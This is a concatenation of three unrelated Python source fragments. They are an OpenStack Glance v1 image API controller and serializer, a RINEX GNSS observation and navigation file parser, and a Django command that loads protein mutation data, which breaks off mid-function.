except exception.BadStoreUri:
msg = "Invalid location %s" % location
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
# check the store exists before we hit the registry, but we
# don't actually care what it is at this point
self.get_store_or_400(req, store)
# retrieve the image size from remote store (if not provided)
image_meta['size'] = self._get_size(req.context, image_meta,
location)
else:
# Ensure that the size attribute is set to zero for directly
# uploadable images (if not provided). The size will be set
# to a non-zero value during upload
image_meta['size'] = image_meta.get('size', 0)
try:
image_meta = registry.add_image_metadata(req.context, image_meta)
self.notifier.info("image.create", redact_loc(image_meta))
return image_meta
except exception.Duplicate:
msg = ("An image with identifier %s already exists" %
image_meta['id'])
LOG.debug(msg)
raise HTTPConflict(explanation=msg,
request=req,
content_type="text/plain")
except exception.Invalid as e:
msg = _("Failed to reserve image. Got error: %(e)s") % {'e': e}
for line in msg.split('\n'):
LOG.debug(line)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
except exception.Forbidden:
msg = "Forbidden to reserve image."
LOG.debug(msg)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
def _upload(self, req, image_meta):
"""
Uploads the payload of the request to a backend store in
Glance. If the `x-image-meta-store` header is set, Glance
will attempt to use that scheme; if not, Glance will use the
scheme set by the flag `default_store` to find the backing store.
:param req: The WSGI/Webob Request object
:param image_meta: Mapping of metadata about image
:raises HTTPConflict if image already exists
:retval The location where the image was stored
"""
copy_from = self._copy_from(req)
if copy_from:
try:
image_data, image_size = self._get_from_store(req.context,
copy_from)
except Exception as e:
upload_utils.safe_kill(req, image_meta['id'])
msg = "Copy from external source failed: %s" % e
LOG.debug(msg)
return
image_meta['size'] = image_size or image_meta['size']
else:
try:
req.get_content_type(('application/octet-stream',))
except exception.InvalidContentType:
upload_utils.safe_kill(req, image_meta['id'])
msg = "Content-Type must be application/octet-stream"
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg)
image_data = req.body_file
scheme = req.headers.get('x-image-meta-store', CONF.default_store)
store = self.get_store_or_400(req, scheme)
image_id = image_meta['id']
LOG.debug("Setting image %s to status 'saving'", image_id)
registry.update_image_metadata(req.context, image_id,
{'status': 'saving'})
LOG.debug("Uploading image data for image %(image_id)s "
"to %(scheme)s store", {'image_id': image_id,
'scheme': scheme})
self.notifier.info("image.prepare", redact_loc(image_meta))
image_meta, location, loc_meta = upload_utils.upload_data_to_store(
req, image_meta, image_data, store, self.notifier)
self.notifier.info('image.upload', redact_loc(image_meta))
return location, loc_meta
def _activate(self, req, image_id, location, location_metadata=None,
from_state=None):
"""
Sets the image status to `active` and the image's location
attribute.
:param req: The WSGI/Webob Request object
:param image_id: Opaque image identifier
:param location: Location of where Glance stored this image
:param location_metadata: a dictionary of storage specific information
"""
image_meta = {}
image_meta['location'] = location
image_meta['status'] = 'active'
if location_metadata:
image_meta['location_data'] = [{'url': location,
'metadata': location_metadata}]
try:
s = from_state
image_meta_data = registry.update_image_metadata(req.context,
image_id,
image_meta,
from_state=s)
self.notifier.info("image.activate", redact_loc(image_meta_data))
self.notifier.info("image.update", redact_loc(image_meta_data))
return image_meta_data
except exception.Duplicate:
with excutils.save_and_reraise_exception():
# Delete image data since it has been supersceded by another
# upload and re-raise.
LOG.debug("duplicate operation - deleting image data for "
" %(id)s (location:%(location)s)" %
{'id': image_id, 'location': image_meta['location']})
upload_utils.initiate_deletion(req, image_meta['location'],
image_id, CONF.delayed_delete)
except exception.Invalid as e:
msg = "Failed to activate image. Got error: %(e)s" % {'e': e}
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
def _upload_and_activate(self, req, image_meta):
"""
Safely uploads the image data in the request payload
and activates the image in the registry after a successful
upload.
:param req: The WSGI/Webob Request object
:param image_meta: Mapping of metadata about image
:retval Mapping of updated image data
"""
image_id = image_meta['id']
# This is necessary because of a bug in Webob 1.0.2 - 1.0.7
# See: https://bitbucket.org/ianb/webob/
# issue/12/fix-for-issue-6-broke-chunked-transfer
req.is_body_readable = True
location, location_metadata = self._upload(req, image_meta)
return self._activate(req,
image_id,
location,
location_metadata,
from_state='saving') if location else None
def _get_size(self, context, image_meta, location):
# retrieve the image size from remote store (if not provided)
try:
return (image_meta.get('size', 0) or
get_size_from_backend(context, location))
except (exception.NotFound, exception.BadStoreUri) as e:
LOG.debug(e)
raise HTTPBadRequest(explanation=e.msg, content_type="text/plain")
def _handle_source(self, req, image_id, image_meta, image_data):
copy_from = self._copy_from(req)
location = image_meta.get('location')
sources = filter(lambda x: x, (copy_from, location, image_data))
if len(sources) >= 2:
msg = "It's invalid to provide multiple image sources."
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
if image_data:
image_meta = self._validate_image_for_activation(req,
image_id,
image_meta)
image_meta = self._upload_and_activate(req, image_meta)
elif copy_from:
msg = _('Triggering asynchronous copy from external source')
LOG.info(msg)
self.pool.spawn_n(self._upload_and_activate, req, image_meta)
else:
if location:
try:
validate_location(req.context, location)
except (exception.BadStoreUri) as bse:
raise HTTPBadRequest(explanation=unicode(bse),
request=req)
self._validate_image_for_activation(req, image_id, image_meta)
image_size_meta = image_meta.get('size')
if image_size_meta:
image_size_store = get_size_from_backend(req.context,
location)
# NOTE(zhiyan): A returned size of zero usually means
# the driver encountered an error. In this case the
# size provided by the client will be used as-is.
if (image_size_store and
image_size_store != image_size_meta):
msg = ("Provided image size must match the stored "
"image size. (provided size: %(ps)d, "
"stored size: %(ss)d)" % {
"ps": image_size_meta,
"ss": image_size_store})
LOG.debug(msg)
raise HTTPConflict(explanation=msg,
request=req,
content_type="text/plain")
image_meta = self._activate(req, image_id, location)
return image_meta
def _validate_image_for_activation(self, req, id, values):
"""Ensures that all required image metadata values are valid."""
image = self.get_image_meta_or_404(req, id)
if 'disk_format' not in values:
values['disk_format'] = image['disk_format']
if 'container_format' not in values:
values['container_format'] = image['container_format']
if 'name' not in values:
values['name'] = image['name']
values = validate_image_meta(req, values)
return values
@utils.mutating
def create(self, req, image_meta, image_data):
"""
Adds a new image to Glance. Four scenarios exist when creating an
image:
1. If the image data is available directly for upload, create can be
passed the image data as the request body and the metadata as the
request headers. The image will initially be 'queued', during
upload it will be in the 'saving' status, and then 'killed' or
'active' depending on whether the upload completed successfully.
2. If the image data exists somewhere else, you can upload indirectly
from the external source using the x-glance-api-copy-from header.
Once the image is uploaded, the external store is not subsequently
consulted, i.e. the image content is served out from the configured
glance image store. State transitions are as for option #1.
3. If the image data exists somewhere else, you can reference the
source using the x-image-meta-location header. The image content
will be served out from the external store, i.e. is never uploaded
to the configured glance image store.
4. If the image data is not available yet, but you'd like reserve a
spot for it, you can omit the data and a record will be created in
the 'queued' state. This exists primarily to maintain backwards
compatibility with OpenStack/Rackspace API semantics.
The request body *must* be encoded as application/octet-stream,
otherwise an HTTPBadRequest is returned.
Upon a successful save of the image data and metadata, a response
containing metadata about the image is returned, including its
opaque identifier.
:param req: The WSGI/Webob Request object
:param image_meta: Mapping of metadata about image
:param image_data: Actual image data that is to be stored
:raises HTTPBadRequest if x-image-meta-location is missing
and the request body is not application/octet-stream
image data.
"""
self._enforce(req, 'add_image')
is_public = image_meta.get('is_public')
if is_public:
self._enforce(req, 'publicize_image')
if Controller._copy_from(req):
self._enforce(req, 'copy_from')
if image_data or Controller._copy_from(req):
self._enforce(req, 'upload_image')
self._enforce_create_protected_props(image_meta['properties'].keys(),
req)
self._enforce_image_property_quota(image_meta, req=req)
image_meta = self._reserve(req, image_meta)
id = image_meta['id']
image_meta = self._handle_source(req, id, image_meta, image_data)
location_uri = image_meta.get('location')
if location_uri:
self.update_store_acls(req, id, location_uri, public=is_public)
# Prevent client from learning the location, as it
# could contain security credentials
image_meta = redact_loc(image_meta)
return {'image_meta': image_meta}
@utils.mutating
def update(self, req, id, image_meta, image_data):
"""
Updates an existing image with the registry.
:param request: The WSGI/Webob Request object
:param id: The opaque image identifier
:retval Returns the updated image information as a mapping
"""
self._enforce(req, 'modify_image')
is_public = image_meta.get('is_public')
if is_public:
self._enforce(req, 'publicize_image')
if Controller._copy_from(req):
self._enforce(req, 'copy_from')
if image_data or Controller._copy_from(req):
self._enforce(req, 'upload_image')
orig_image_meta = self.get_image_meta_or_404(req, id)
orig_status = orig_image_meta['status']
# Do not allow any updates on a deleted image.
# Fix for LP Bug #1060930
if orig_status == 'deleted':
msg = _("Forbidden to update deleted image.")
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
if req.context.is_admin is False:
# Once an image is 'active' only an admin can
# modify certain core metadata keys
for key in ACTIVE_IMMUTABLE:
if (orig_status == 'active' and image_meta.get(key) is not None
and image_meta.get(key) != orig_image_meta.get(key)):
msg = _("Forbidden to modify '%s' of active image.") % key
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
# The default behaviour for a PUT /images/<IMAGE_ID> is to
# override any properties that were previously set. This, however,
# leads to a number of issues for the common use case where a caller
# registers an image with some properties and then almost immediately
# uploads an image file along with some more properties. Here, we
# check for a special header value to be false in order to force
# properties NOT to be purged. However we also disable purging of
# properties if an image file is being uploaded...
purge_props = req.headers.get('x-glance-registry-purge-props', True)
purge_props = (strutils.bool_from_string(purge_props) and
image_data is None)
if image_data is not None and orig_status != 'queued':
raise HTTPConflict(_("Cannot upload to an unqueued image"))
# Only allow the Location|Copy-From fields to be modified if the
# image is in queued status, which indicates that the user called
# POST /images but originally supply neither a Location|Copy-From
# field NOR image data
location = self._external_source(image_meta, req)
reactivating = orig_status != 'queued' and location
activating = orig_status == 'queued' and (location or image_data)
# Make image public in the backend store (if implemented)
orig_or_updated_loc = location or orig_image_meta.get('location')
if orig_or_updated_loc:
try:
self.update_store_acls(req, id, orig_or_updated_loc,
public=is_public)
except exception.BadStoreUri:
msg = "Invalid location %s" % location
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
if reactivating:
msg = _("Attempted to update Location field for an image "
"not in queued status.")
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
# ensure requester has permissions to create/update/delete properties
# according to property-protections.conf
orig_keys = set(orig_image_meta['properties'])
new_keys = set(image_meta['properties'])
self._enforce_update_protected_props(
orig_keys.intersection(new_keys), image_meta,
orig_image_meta, req)
self._enforce_create_protected_props(
new_keys.difference(orig_keys), req)
if purge_props:
self._enforce_delete_protected_props(
orig_keys.difference(new_keys), image_meta,
orig_image_meta, req)
self._enforce_image_property_quota(image_meta,
orig_image_meta=orig_image_meta,
purge_props=purge_props,
req=req)
try:
if location:
image_meta['size'] = self._get_size(req.context, image_meta,
location)
image_meta = registry.update_image_metadata(req.context,
id,
image_meta,
purge_props)
if activating:
image_meta = self._handle_source(req, id, image_meta,
image_data)
except exception.Invalid as e:
msg = ("Failed to update image metadata. Got error: %(e)s" %
{'e': e})
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=req,
content_type="text/plain")
except exception.NotFound as e:
msg = _("Failed to find image to update: %(e)s") % {'e': e}
for line in msg.split('\n'):
LOG.info(line)
raise HTTPNotFound(explanation=msg,
request=req,
content_type="text/plain")
except exception.Forbidden as e:
msg = _("Forbidden to update image: %(e)s") % {'e': e}
for line in msg.split('\n'):
LOG.info(line)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
except (exception.Conflict, exception.Duplicate) as e:
LOG.info(utils.exception_to_str(e))
raise HTTPConflict(body='Image operation conflicts',
request=req,
content_type='text/plain')
else:
self.notifier.info('image.update', redact_loc(image_meta))
# Prevent client from learning the location, as it
# could contain security credentials
image_meta = redact_loc(image_meta)
self._enforce_read_protected_props(image_meta, req)
return {'image_meta': image_meta}
@utils.mutating
def delete(self, req, id):
"""
Deletes the image and all its chunks from the Glance
:param req: The WSGI/Webob Request object
:param id: The opaque image identifier
:raises HttpBadRequest if image registry is invalid
:raises HttpNotFound if image or any chunk is not available
:raises HttpUnauthorized if image or any chunk is not
deleteable by the requesting user
"""
self._enforce(req, 'delete_image')
image = self.get_image_meta_or_404(req, id)
if image['protected']:
msg = "Image is protected"
LOG.debug(msg)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
if image['status'] == 'pending_delete':
msg = "Forbidden to delete a %s image." % image['status']
LOG.debug(msg)
raise HTTPForbidden(explanation=msg, request=req,
content_type="text/plain")
elif image['status'] == 'deleted':
msg = "Image %s not found." % id
LOG.debug(msg)
raise HTTPNotFound(explanation=msg, request=req,
content_type="text/plain")
if image['location'] and CONF.delayed_delete:
status = 'pending_delete'
else:
status = 'deleted'
ori_status = image['status']
try:
# Update the image from the registry first, since we rely on it
# for authorization checks.
# See https://bugs.launchpad.net/glance/+bug/1065187
image = registry.update_image_metadata(req.context, id,
{'status': status})
try:
# The image's location field may be None in the case
# of a saving or queued image, therefore don't ask a backend
# to delete the image if the backend doesn't yet store it.
# See https://bugs.launchpad.net/glance/+bug/747799
if image['location']:
upload_utils.initiate_deletion(req, image['location'], id,
CONF.delayed_delete)
except Exception as e:
registry.update_image_metadata(req.context, id,
{'status': ori_status})
raise e
registry.delete_image_metadata(req.context, id)
except exception.NotFound as e:
msg = _("Failed to find image to delete: %(e)s") % {'e': e}
for line in msg.split('\n'):
LOG.info(line)
raise HTTPNotFound(explanation=msg,
request=req,
content_type="text/plain")
except exception.Forbidden as e:
msg = _("Forbidden to delete image: %(e)s") % {'e': e}
for line in msg.split('\n'):
LOG.info(line)
raise HTTPForbidden(explanation=msg,
request=req,
content_type="text/plain")
else:
self.notifier.info('image.delete', redact_loc(image))
return Response(body='', status=200)
def get_store_or_400(self, request, scheme):
"""
Grabs the storage backend for the supplied store name
or raises an HTTPBadRequest (400) response
:param request: The WSGI/Webob Request object
:param scheme: The backend store scheme
:raises HTTPNotFound if store does not exist
"""
try:
return get_store_from_scheme(request.context, scheme)
except exception.UnknownScheme:
msg = "Store for scheme %s not found" % scheme
LOG.debug(msg)
raise HTTPBadRequest(explanation=msg,
request=request,
content_type='text/plain')
class ImageDeserializer(wsgi.JSONRequestDeserializer):
"""Handles deserialization of specific controller method requests."""
def _deserialize(self, request):
result = {}
try:
result['image_meta'] = utils.get_image_meta_from_headers(request)
except exception.InvalidParameterValue as e:
msg = utils.exception_to_str(e)
LOG.warn(msg, exc_info=True)
raise HTTPBadRequest(explanation=e.msg, request=request)
image_meta = result['image_meta']
image_meta = validate_image_meta(request, image_meta)
if request.content_length:
image_size = request.content_length
elif 'size' in image_meta:
image_size = image_meta['size']
else:
image_size = None
data = request.body_file if self.has_body(request) else None
if image_size is None and data is not None:
data = utils.LimitingReader(data, CONF.image_size_cap)
#NOTE(bcwaldon): this is a hack to make sure the downstream code
# gets the correct image data
request.body_file = data
elif image_size > CONF.image_size_cap:
max_image_size = CONF.image_size_cap
msg = _("Denying attempt to upload image larger than %d bytes.")
LOG.warn(msg % max_image_size)
raise HTTPBadRequest(explanation=msg % max_image_size,
request=request)
result['image_data'] = data
return result
def create(self, request):
return self._deserialize(request)
def update(self, request):
return self._deserialize(request)
class ImageSerializer(wsgi.JSONResponseSerializer):
"""Handles serialization of specific controller method responses."""
def __init__(self):
self.notifier = notifier.Notifier()
def _inject_location_header(self, response, image_meta):
location = self._get_image_location(image_meta)
response.headers['Location'] = location.encode('utf-8')
def _inject_checksum_header(self, response, image_meta):
if image_meta['checksum'] is not None:
response.headers['ETag'] = image_meta['checksum'].encode('utf-8')
def _inject_image_meta_headers(self, response, image_meta):
"""
Given a response and mapping of image metadata, injects
the Response with a set of HTTP headers for the image
metadata. Each main image metadata field is injected
as a HTTP header with key 'x-image-meta-<FIELD>' except
for the properties field, which is further broken out
into a set of 'x-image-meta-property-<KEY>' headers
:param response: The Webob Response object
:param image_meta: Mapping of image metadata
"""
headers = utils.image_meta_to_http_headers(image_meta)
for k, v in headers.items():
response.headers[k.encode('utf-8')] = v.encode('utf-8')
def _get_image_location(self, image_meta):
"""Build a relative url to reach the image defined by image_meta."""
return "/v1/images/%s" % image_meta['id']
def meta(self, response, result):
image_meta = result['image_meta']
self._inject_image_meta_headers(response, image_meta)
self._inject_checksum_header(response, image_meta)
return response
def show(self, response, result):
image_meta = result['image_meta']
image_iter = result['image_iterator']
# image_meta['size'] should be an int, but could possibly be a str
expected_size = int(image_meta['size'])
response.app_iter = common.size_checked_iter(
response, image_meta, expected_size, image_iter, self.notifier)
# Using app_iter blanks content-length, so we set it here...
response.headers['Content-Length'] = str(image_meta['size'])
response.headers['Content-Type'] = 'application/octet-stream'
self._inject_image_meta_headers(response, image_meta)
self._inject_checksum_header(response, image_meta)
return response
def update(self, response, result):
image_meta = result['image_meta']
response.body = self.to_json(dict(image=image_meta))
response.headers['Content-Type'] = 'application/json'
self._inject_checksum_header(response, image_meta)
return response
def create(self, response, result):
image_meta = result['image_meta']
response.status = 201
response.headers['Content-Type'] = 'application/json'
response.body = self.to_json(dict(image=image_meta))
self._inject_location_header(response, image_meta)
self._inject_checksum_header(response, image_meta)
return response
def create_resource():
"""Images resource factory method"""
deserializer = ImageDeserializer()
serializer = ImageSerializer()
return wsgi.Resource(Controller(), deserializer, serializer)
|
|
#!/usr/bin/env
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 15 14:15:16 2016
@author of the file: smrak
Autrors of the code: Greg Starr and Michael Hirsch
"""
from __future__ import division,absolute_import,print_function
import numpy as np
from datetime import datetime
from pandas import Panel4D, DataFrame, Series
from pandas.io.pytables import read_hdf
from os.path import splitext,expanduser
from io import BytesIO
from os.path import getsize
import yaml
import glob
def writeRinexObsHeader2yaml(folder):
"""
Sebastijan Mrak
Function takes the folder with Rinex Obseravation files and finds all files
with '.15o' extension. Than it iterates through all filaes to find header and
save it to yaml file with the same name.
"""
ext = '*.1*o'
flist = sorted(glob.glob(folder+ext))
for doc in flist:
#print doc
header = readRinexObsHeader(doc)
filename = splitext(expanduser(doc))
yaml_fn = filename[0] + '.yaml'
with open(yaml_fn, 'w') as outfile:
yaml.dump(header, outfile, default_flow_style=True)
def readRinexNav(rinex_nav_filename):
"""
Michael Hirsch
It may actually be faster to read the entire file via f.read() and then .split()
and asarray().reshape() to the final result, but I did it frame by frame.
http://gage14.upc.es/gLAB/HTML/GPS_Navigation_Rinex_v2.11.html
"""
startcol = 3 #column where numerical data starts
nfloat = 19 #number of text elements per float data number
nline = 7 #number of lines per record
with open(expanduser(rinex_nav_filename),'r') as f:
#find end of header, which has non-constant length
while True:
if 'END OF HEADER' in f.readline(): break
#handle frame by frame
sv = []; epoch=[]; raws=''
while True:
headln = f.readline()
if not headln: break
#handle the header
sv.append(headln[:2])
year = int(headln[2:5])
if (80 <= year <= 99):
year+=1900
elif (year < 80): #good till year 2180
year+=2000
epoch.append(datetime(year = year,
month = int(headln[5:8]),
day = int(headln[8:11]),
hour = int(headln[11:14]),
minute = int(headln[14:17]),
second = int(headln[17:20]),
microsecond = int(headln[21])*100000))
"""
now get the data.
Use rstrip() to chomp newlines consistently on Windows and Python 2.7/3.4
Specifically [:-1] doesn't work consistently as .rstrip() does here.
"""
raw = (headln[22:].rstrip() +
''.join(f.readline()[startcol:].rstrip() for _ in range(nline-1))
+f.readline()[startcol:40].rstrip())
raws += raw + '\n'
raws = raws.replace('D','E')
strio = BytesIO(raws.encode())
darr = np.genfromtxt(strio,delimiter=nfloat)
nav= DataFrame(darr, epoch,
['SVclockBias','SVclockDrift','SVclockDriftRate','IODE',
'Crs','DeltaN','M0','Cuc','Eccentricity','Cus','sqrtA','TimeEph',
'Cic','OMEGA','CIS','Io','Crc','omega','OMEGA DOT','IDOT',
'CodesL2','GPSWeek','L2Pflag','SVacc','SVhealth','TGD','IODC',
'TransTime','FitIntvl'])
nav['sv'] = Series(np.asarray(sv,int), index=nav.index)
#print (type(nav))
return nav
def writeRinexObs2Hdf(rinex_obs_file_name, odir=None):
"""
Function writeObs2Hdf takes the rinex obseravation data .15o and writes
the observation data into new hdf .h5 file in the same folder as original
rinex observation data file.
Code is resturctured after Greg Starr's rinexObs function
"""
filename,ext = splitext(expanduser(rinex_obs_file_name))
with open(rinex_obs_file_name,'r') as f:
lines = f.read().splitlines(True)
lines.append('')
header,version,headlines,obstimes,sats,svset = scan(lines)
data = processBlocks(lines,header,obstimes,svset,headlines,sats)
h5fn = filename + '.h5'
if odir is not None:
h5fn = odir
data.to_hdf(h5fn,key='data',mode='w',format='table')
print('Write succesfull. \n {} is a RINEX {} file, {} kB.'.format(
rinex_obs_file_name,version,getsize(rinex_obs_file_name)/1000.0))
def readRinexObsHeader(obs_file_name):
with open(obs_file_name, 'r') as f:
lines = f.read().splitlines(True)
lines.append('')
header,version,headlines,obstimes,sats,svset = scan(lines)
return header
def readRinexObsHdf(hdf5_file_name):
"""
Function readObsHdf opens the input .h5 file with raw data structured in
hdf file. Besides restructured observation data in pandas.panel4D, the
function finds the original obseravarion rinex data with .15o extension,
which has to be in the same folder af hdf file, and reads the header of it.
Function's output is thus, header data structured as dictionary and
observarion data structured as pandas.panel4D type.
Code is resturctured after Greg Starr's rinexObs function
"""
filename, ext = splitext(expanduser(hdf5_file_name))
obs_data_ext = '.15o'
obs_header_file_name = filename + obs_data_ext
with open(obs_header_file_name,'r') as f:
lines = f.read().splitlines(True)
lines.append('')
header,version,headlines,obstimes,sats,svset = scan(lines)
data = read_hdf(hdf5_file_name,key='data')
return header, data, list(svset), obstimes
def scan(lines):
"""
Written by greg Starr
This function sets up the rinex file parsing by quickly running through
the file, looking for the line at which each time block starts, the time
of each block, the satellites in view at each time, and overall what
satellites are in the rinex file
inputs:
lines - list containing each line in the rinex file as a string
outputs:
header - all the header info in a dictionary
verRinex - the rinex file's version
headlines - a list of ints, the index of lines where each time block
starts
obstimes - list of times corresponding to each block, same length as
headlines
sats - the satellites in view at each time, should be same length
as headlines
svset - the set of all the satellites in the rinex file
"""
header={}
eoh=0
for i,line in enumerate(lines):
if "END OF HEADER" in line:
eoh=i
break
if line[60:].strip() not in header:
header[line[60:].strip()] = line[:60].strip()
else:
header[line[60:].strip()] += " "+line[:60].strip()
verRinex = float(header['RINEX VERSION / TYPE'].split()[0])
header['APPROX POSITION XYZ'] = [float(i) for i in header[
'APPROX POSITION XYZ'].split()]
header['# / TYPES OF OBSERV'] = header['# / TYPES OF OBSERV'].split()
header['# / TYPES OF OBSERV'][0] = int(header['# / TYPES OF OBSERV'][0])
header['INTERVAL'] = float(header['INTERVAL'])
headlines=[]
obstimes=[]
sats=[]
svset=set()
i = eoh + 1
while True:
if not lines[i]: break
if not int(lines[i][28]):
#no flag or flag=0
headlines.append(i)
obstimes.append(_obstime([lines[i][1:3],lines[i][4:6],
lines[i][7:9],lines[i][10:12],
lines[i][13:15],lines[i][16:26]]))
numsvs = int(lines[i][30:32])
if(numsvs > 12):
sp=[]
for s in range(numsvs):
if s == 12 :
i += 1
sp.append(int(lines[i][33+(s%12)*3:35+(s%12)*3]))
sats.append(sp)
else:
sats.append([int(lines[i][33+s*3:35+s*3]) for s in range(numsvs)])
i+=numsvs*int(np.ceil(header['# / TYPES OF OBSERV'][0]/5))+1
else:
#there was a comment or some header info
flag=int(lines[i][28])
if(flag!=4):
print(flag)
skip=int(lines[i][30:32])
i+=skip+1
for sv in sats:
svset = svset.union(set(sv))
return header,verRinex,headlines,obstimes,sats,svset
def _obstime(fol):
"""
Written by greg Starr
turns a listed date collected from the rinex file into a datetime,
this is just a utility function.
"""
year = int(fol[0])
if (80 <= year <= 99):
year+=1900
elif (year < 80): #because we might pass in four-digit year
year+=2000
return datetime(year = year, month = int(fol[1]), day = int(fol[2]),
hour = int(fol[3]), minute = int(fol[4]),
second = int(float(fol[5])),
microsecond = int(float(fol[5]) % 1) * 100000
)
def _block2df(block,obstypes,svnames,svnum):
"""
input: block of text corresponding to one time increment INTERVAL of
RINEX file output: 2-D array of float64 data from block. Future: consider
whether best to use Numpy, Pandas, or Xray.
"""
nobs = len(obstypes)
stride = 3
strio = BytesIO(block.encode())
barr = np.genfromtxt(strio, delimiter=(14,1,1)*5).reshape((svnum,-1),
order='C')
data = barr[:,0:nobs*stride:stride]
lli = barr[:,1:nobs*stride:stride]
ssi = barr[:,2:nobs*stride:stride]
data = np.vstack(([data],[lli],[ssi])).T
return data
def processBlocks(lines,header,obstimes,svset,headlines,sats):
"""
turns the rinex file and the info from scan() into a Panel4D
inputs:
the info from scan(), see scan() above
outputs:
blocks - the Panel4D with all the data, see above for organization
"""
obstypes = header['# / TYPES OF OBSERV'][1:]
blocks = np.nan*np.ones((len(obstypes),max(svset)+1,len(obstimes),3))
for i in range(len(headlines)):
linesinblock = len(sats[i])*int(np.ceil(header['# / TYPES OF OBSERV'][0]/5))
block = ''.join(lines[headlines[i]+1+int(len(sats[i])/13):headlines[i]+linesinblock+1+int(len(sats[i])/13)])
bdf = _block2df(block,obstypes,sats[i],len(sats[i]))
blocks[:,np.asarray(sats[i],int),i,:] = bdf
#print (blocks)
"""
it is way faster to turn a big numpy array into a Panel4D than
to make the Panel4D first and assign it one cell at a time,
Panel4Ds are slow, it is best to use numpy when possible
"""
blocks = Panel4D(blocks,
labels=obstypes,
items=np.arange(max(svset)+1),
major_axis=obstimes,
minor_axis=['data','lli','ssi'])
blocks = blocks[:,list(svset),:,:]
return blocks
|
|
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.db import connection
from django.db import IntegrityError
from protein.models import (Protein, ProteinGProtein,ProteinGProteinPair, ProteinConformation, ProteinState, ProteinFamily, ProteinAlias,
ProteinSequenceType, Species, Gene, ProteinSource, ProteinSegment)
from residue.models import (ResidueNumberingScheme, ResidueGenericNumber, Residue, ResidueGenericNumberEquivalent)
from mutational_landscape.models import NaturalMutations, CancerMutations, DiseaseMutations, PTMs
import pandas as pd
import numpy as np
import math, os
import logging
import re
from decimal import *
getcontext().prec = 20
class Command(BaseCommand):
help = 'Build Mutational Landscape'
# source file directory
mutation_data_path = os.sep.join([settings.DATA_DIR, 'mutational_landscape'])
logger = logging.getLogger(__name__)
def add_arguments(self, parser):
parser.add_argument('--filename', action='append', dest='filename',
help='Filename to import. Can be used multiple times')
def handle(self, *args, **options):
if options['filename']:
filenames = options['filename']
else:
filenames = False
try:
self.purge_data()
self.create_PTMs()
self.create_natural_mutations()
# self.create_cancer_mutations()
# self.create_disease_mutations()
except Exception as msg:
print(msg)
self.logger.error(msg)
def purge_data(self):
try:
PTMs.objects.all().delete()
NaturalMutations.objects.all().delete()
# CancerMutations.objects.all().delete()
# DiseaseMutations.objects.all().delete()
except Exception as msg:
print(msg)
self.logger.warning('Existing data cannot be deleted')
def create_natural_mutations(self, filenames=False):
self.logger.info('CREATING NATURAL MUTATIONS')
# read source files
if not filenames:
filenames = [fn for fn in os.listdir(self.mutation_data_path) if fn.endswith('exac.csv')]
for filename in filenames:
filepath = os.sep.join([self.mutation_data_path, filename])
snp_data = pd.read_csv(filepath, low_memory=False)
for index, entry in enumerate(snp_data.iterrows()):
entry_name = snp_data[index:index+1]['EntryName'].values[0]
sequence_number = snp_data[index:index+1]['SequenceNumber'].values[0]
allele_frequency = float(snp_data[index:index+1]['Allele Frequency'].values[0])
allele_count = int(snp_data[index:index+1]['Allele Count'].values[0])
allele_number = int(snp_data[index:index+1]['Allele Number'].values[0])
number_homozygotes = int(snp_data[index:index+1]['Number of Homozygotes'].values[0])
type = snp_data[index:index+1]['type'].values[0]
if 'lof' in filename:
prot_con = snp_data[index:index+1]['Protein Consequence'].values[0]
splitterm = re.findall(r'\d+', prot_con)[0]
amino_acid = prot_con.split(splitterm)[1]
sift_score = None
polyphen_score = None
else:
amino_acid = snp_data[index:index+1]['NMaa'].values[0]
sift_score = float(snp_data[index:index+1]['sift_score'].values[0])
polyphen_score = float(snp_data[index:index+1]['polyphen_score'].values[0])
try:
p = Protein.objects.get(entry_name=entry_name)
except Protein.DoesNotExist:
self.logger.warning('Protein not found for entry_name {}'.format(entry_name))
continue
try:
res=Residue.objects.get(protein_conformation__protein=p, sequence_number=sequence_number)
except:
# self.logger.warning('No residue number (GAP - position) for', sequence_number, "in ", p.name, "")
continue
if res:
# try:
snp, created = NaturalMutations.objects.get_or_create(protein=p, residue=res, amino_acid=amino_acid, allele_frequency=allele_frequency, allele_count=allele_count, allele_number=allele_number, number_homozygotes=number_homozygotes,
sift_score=sift_score, type=type, polyphen_score=polyphen_score) #
# if created:
# self.logger.info('Created SNP for ' + str(sequence_number) + ' for protein ' + str(p.name))
# except:
# print(entry_name, sequence_number, allele_frequency, allele_count, allele_number, number_homozygotes, type)
# self.logger.error('Failed creating SNP for ' + sequence_number + ' for protein ' + p.name)
self.logger.info('COMPLETED CREATING NATURAL MUTATIONS')
def create_cancer_mutations(self, filenames=False):
self.logger.info('CREATING CANCER MUTATIONS')
# read source files
if not filenames:
filenames = [fn for fn in os.listdir(self.mutation_data_path) if fn.endswith('cancer.csv')]
for filename in filenames:
filepath = os.sep.join([self.mutation_data_path, filename])
cancer_data = pd.read_csv(filepath, low_memory=False)
for index, entry in enumerate(cancer_data.iterrows()):
entry_name = cancer_data[index:index+1]['EntryName'].values[0]
sequence_number = cancer_data[index:index+1]['site'].values[0]
amino_acid = cancer_data[index:index+1]['variant'].values[0]
# allele_frequency = float(cancer_data[index:index+1]['allelefreq'].values[0])
# allele_count = int(cancer_data[index:index+1]['allelecount'].values[0])
try:
p = Protein.objects.get(entry_name=entry_name)
except Protein.DoesNotExist:
self.logger.warning('Protein not found for entry_name {}'.format(entry_name))
continue
try:
res=Residue.objects.get(protein_conformation__protein=p, sequence_number=sequence_number)
except:
print('No residue number for', str(sequence_number), "in ", p.name)
# self.logger.warning('No residue number for', res, "in ", p.name)
continue
if res:
# try:
cancer, created = CancerMutations.objects.get_or_create(protein=p, residue=res, amino_acid=amino_acid, cancer_type='unknown')
if created:
